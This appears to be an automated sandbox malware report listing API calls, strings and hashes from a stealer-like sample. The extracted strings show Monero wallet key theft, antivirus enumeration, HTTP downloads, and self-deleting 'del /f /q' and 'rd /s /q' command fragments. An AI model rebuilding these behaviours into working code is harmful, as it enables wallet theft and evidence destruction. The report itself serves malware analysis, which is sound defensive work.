                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                                    • lstrcat.KERNEL32(00000000,00425D84), ref: 00408AE6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                                    • lstrcat.KERNEL32(00000000,00425D88), ref: 00408B06
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00408C7F
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                    • String ID:
                                                                                    • API String ID: 156379684-0
                                                                                    • Opcode ID: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                                    • Instruction ID: 995570c1c0ce675a9085062181732195259fe43f91e974d6a0640a795ee953cc
                                                                                    • Opcode Fuzzy Hash: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                                    • Instruction Fuzzy Hash: 3AF15771804158EADB15EBE4DD1ABEEBB74AF18308F10807EE505721E2DF782A09DB25
                                                                                    Function 0041077C Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155memorycomtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410781
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                    • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                    • VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                                      • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                      • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                      • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                                    • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 00410893
                                                                                    • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                                    • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                                    • wsprintfA.USER32 ref: 004108CC
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                    • API String ID: 2456697202-461178377
                                                                                    • Opcode ID: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                                    • Instruction ID: 4b36eb2a1d5a1bedc29b67d6ed82d78b3e43d11d07795a3f045295924e426f07
                                                                                    • Opcode Fuzzy Hash: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                                    • Instruction Fuzzy Hash: 63516C71A01228BBCB20DB95DC49EEFBB7CEF49B10F504116F515E6190C7B89A41CBA8
                                                                                    Function 004118AE Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004118B3
                                                                                    • strtok_s.MSVCRT ref: 004118E4
                                                                                    • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                                    • strtok_s.MSVCRT ref: 00411CA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                    • String ID: false$true
                                                                                    • API String ID: 49562497-2658103896
                                                                                    • Opcode ID: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                                    • Instruction ID: ba927b6fbe385cdc95ceeb1740fcb97b1cf008379e2e115a61cc2516e6170599
                                                                                    • Opcode Fuzzy Hash: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                                    • Instruction Fuzzy Hash: B6C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64
                                                                                    Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174networkfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID: ERROR$ERROR$GET
                                                                                    • API String ID: 2435781452-2509457195
                                                                                    • Opcode ID: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                                    • Instruction ID: c1fd0c265216fd47394e40449a31f27cb744319a2eff906596a5c238740c7f68
                                                                                    • Opcode Fuzzy Hash: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                                    • Instruction Fuzzy Hash: 93512F71900119AFEB11EBE0DC85FEFBBB9EB09744F10403AF605B2191DB795A48CBA5
                                                                                    Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004041B7
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                    • String ID: GET
                                                                                    • API String ID: 1687531150-1805413626
                                                                                    • Opcode ID: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                    • Instruction ID: 7ce3078965428967d931fab95435fba2e2eaf60a30af71eeb75a30b69647e977
                                                                                    • Opcode Fuzzy Hash: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                    • Instruction Fuzzy Hash: 07516DB2900219AFDB10EFE0CC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                                    Function 004136E3 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004136E8
                                                                                    • memset.MSVCRT ref: 00413708
                                                                                    • memset.MSVCRT ref: 00413714
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                                    • memset.MSVCRT ref: 004138C2
                                                                                    • memset.MSVCRT ref: 004138D0
                                                                                    • ExitProcess.KERNEL32 ref: 004138E1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                    • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<$pr
                                                                                    • API String ID: 1312519015-1846221802
                                                                                    • Opcode ID: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                                    • Instruction ID: f7fb810ff7d1253c450dda7b52a61bb1d28e29dbb724758fa3153a55c7d62ffe
                                                                                    • Opcode Fuzzy Hash: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                                    • Instruction Fuzzy Hash: 24513EB1D0424DEEDB11EBE5C992ADEBBB8AF18304F50017EE105B3582DB785B48CB65
                                                                                    Function 00410925 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041092A
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                    • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                    • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000), ref: 00410C95
                                                                                      • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                    • API String ID: 3694693100-315474579
                                                                                    • Opcode ID: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                                    • Instruction ID: 31939d6998afadb2a5dbf95c0d2b4f071c2bc660873cc242f14b71194dd59c4b
                                                                                    • Opcode Fuzzy Hash: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                                    • Instruction Fuzzy Hash: 5B418E70A01229BBCB20DB95DD49EEF7F78EF49B60F60411AF115A6180C7B85A41CBA8
                                                                                    Function 00401C6B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 179stringfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401C70
                                                                                    • memset.MSVCRT ref: 00401C8E
                                                                                      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                      • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                      • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
